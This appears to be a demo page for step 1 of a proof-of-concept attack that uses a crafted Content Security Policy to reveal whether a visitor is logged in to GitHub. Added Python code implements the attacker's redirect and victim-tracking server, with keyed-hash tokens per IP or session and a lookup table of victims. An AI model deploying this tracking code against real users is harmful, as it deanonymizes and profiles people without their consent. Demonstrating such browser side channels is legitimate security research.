The goal of this attack PoC is to exfiltrate information about a user,
using an attacker-controlled website with a crafted Content Security Policy.
The result is a disclosure of whether the targeted user (the victim) is logged in on GitHub.
You are the victim (don't worry: your privacy won't be breached).
You are currently visiting the attacker's website (this server is under the attacker's control).
This page is the 1st step of the attack. It redirects the victim to a 2nd step,
adding a token (say, their IP) to the URL. This way, the attacker can track the user it targets.
Please click the link below, though a real attack would use an HTTP-header redirection (Location), which needs no click from the victim.
step-2.php?ip=d8b0be175a360e259b5d84080c778730
Note: the token added in this example is a random MD5 hash. In a practical attack, it could be the victim's IP, a session token on the attacker's website, or anything else that identifies the visitor.
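The following is an added illustration of what step 1 does server-side; it is not the page's own step-1.php. It assumes a Python handler in place of PHP, an in-memory token store (a dict) and an HMAC key that only the attacker's server knows. It shows the three token choices the note mentions (random, hashed IP, attacker-site session id), the Location redirect a real attack would use instead of a clickable link, and the reverse lookup that maps a step-2 URL back to the victim when it later shows up in whatever step 2 sends to the attacker's server.

```python
"""Step 1 of the CSP login-detection PoC: the attacker's redirect endpoint.

Added illustration, not the page's own step-1.php. Assumes a server-side
token store (a dict here) and the step-2 path named on the page.
"""
import hashlib
import hmac
import secrets
import time
from typing import Optional
from urllib.parse import parse_qs, urlencode, urlsplit

STEP2_PATH = "step-2.php"                 # endpoint named on the page
HMAC_KEY = b"attacker-server-secret"      # assumed: known only to the attacker's server

# Assumed token registry: token -> what the attacker knows about the victim.
TOKEN_STORE: dict = {}


def make_token(client_ip: Optional[str] = None, session_id: Optional[str] = None) -> str:
    """Return a 32-hex-char token (same shape as the random MD5 on the page).

    - With no identifier, the token is random: the page's demo case.
    - With a client IP or an attacker-site session id, the token is a keyed
      MD5 of it, so the same victim maps to the same token across visits
      while the raw IP never appears in the URL. (MD5 is fine here; the
      token only needs to be unguessable by the victim, not collision-proof.)
    """
    ident = session_id or client_ip
    if ident is None:
        return secrets.token_hex(16)
    return hmac.new(HMAC_KEY, ident.encode(), hashlib.md5).hexdigest()


def build_step2_url(token: str) -> str:
    """URL the victim is sent to, e.g. step-2.php?ip=<token>."""
    return f"{STEP2_PATH}?{urlencode({'ip': token})}"


def step1_redirect(client_ip: str, session_id: Optional[str] = None):
    """Build the HTTP response for step 1: a 302 with a Location header.

    Returns (status, headers) the way a WSGI handler would. The token is
    recorded server-side so that anything step 2 later reports back with
    this URL in it can be tied to this visitor.
    """
    token = make_token(client_ip, session_id)
    TOKEN_STORE[token] = {"ip": client_ip, "session": session_id, "ts": time.time()}
    headers = [
        ("Location", build_step2_url(token)),
        ("Cache-Control", "no-store"),   # never let a proxy replay one victim's token to another
    ]
    return "302 Found", headers


def lookup_victim(url: str) -> Optional[dict]:
    """Map a step-2 URL (as seen in data sent back to the attacker) to the victim record."""
    token = parse_qs(urlsplit(url).query).get("ip", [None])[0]
    return TOKEN_STORE.get(token) if token else None


if __name__ == "__main__":
    # Constructed sample request: a victim arriving from a documentation-range IP.
    status, headers = step1_redirect("203.0.113.5")
    print(status, dict(headers)["Location"])
    print(lookup_victim(dict(headers)["Location"]))
```

The random-token branch reproduces the demo on this page; the keyed-hash branch is what a tracking attacker would actually use, since it gives a stable per-victim identifier without leaking the IP to anyone who sees the URL.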